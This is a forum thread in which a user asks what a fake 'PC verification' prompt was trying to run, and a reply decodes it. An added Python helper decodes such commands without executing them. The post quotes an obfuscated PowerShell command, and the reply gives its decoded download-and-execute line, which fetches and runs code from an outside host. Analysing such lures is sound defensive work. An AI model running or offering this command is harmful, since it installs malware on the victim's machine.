this post was submitted on 23 Jun 2025
17 points (90.5% liked)

Windows 11


Yeah, don't put this in, but can anyone give me an idea of what they were trying to do? The website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real PC verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

[–] [email protected] 21 points 3 weeks ago

The base64-encoded payload is:
$site = Invoke-RestMethod 'https://mastraw.top/me/day'; iEx $site

It would download malware and install it on your machine.
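Added example, not part of the thread: a small Python triage helper that pulls the encoded argument out of a pasted command line like the one in the post, decodes it (base64 over UTF-16LE) without running anything, and flags the fetch-then-execute pattern the comment describes. The function names are hypothetical, and the sample command is constructed with a placeholder URL (`example.invalid`).

```python
import base64
import re

# Matches "<-|/>flag <value>"; powershell.exe accepts both prefixes and
# abbreviations of -EncodedCommand (the command in the post uses /e).
FLAG = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")
FETCH = re.compile(r"\b(invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring)\b", re.I)
EXEC = re.compile(r"\b(invoke-expression|iex)\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def extract_encoded(cmdline):
    """Return the base64 argument of an -EncodedCommand style switch, or None."""
    for name, blob in FLAG.findall(cmdline):
        name = name.lower()
        if name == "ec" or "encodedcommand".startswith(name):
            return blob
    return None


def decode_encoded_command(blob):
    """Decode base64 -> UTF-16LE text without executing anything."""
    blob = blob.strip().rstrip("=")
    if len(blob) % 4 == 1:          # truncated or redacted tail: drop the stray char
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)  # restore padding
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def triage(cmdline):
    """Summarise a pasted command line for an analyst."""
    blob = extract_encoded(cmdline)
    script = decode_encoded_command(blob) if blob else ""
    return {
        "script": script,
        "urls": [u.replace("http", "hxxp", 1) for u in URL.findall(script)],  # defanged
        "download_cradle": bool(FETCH.search(script) and EXEC.search(script)),
        "policy_bypass": bool(re.search(r"[-/]ep?\w*\s+bypass", cmdline, re.I)),
    }


# Constructed sample in the same shape as the command in the post; the URL is a
# placeholder (example.invalid), not the one from the thread.
SAMPLE_SCRIPT = "$site = Invoke-RestMethod 'https://example.invalid/me/day'; iEx $site"
SAMPLE_CMD = ("conhost cmd /c powershell /ep bypass /e "
              + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode() + " /W 1")

if __name__ == "__main__":
    print(triage(SAMPLE_CMD))
```

The matching is case-insensitive because PowerShell is, which is why spellings like `iEx` do not evade it.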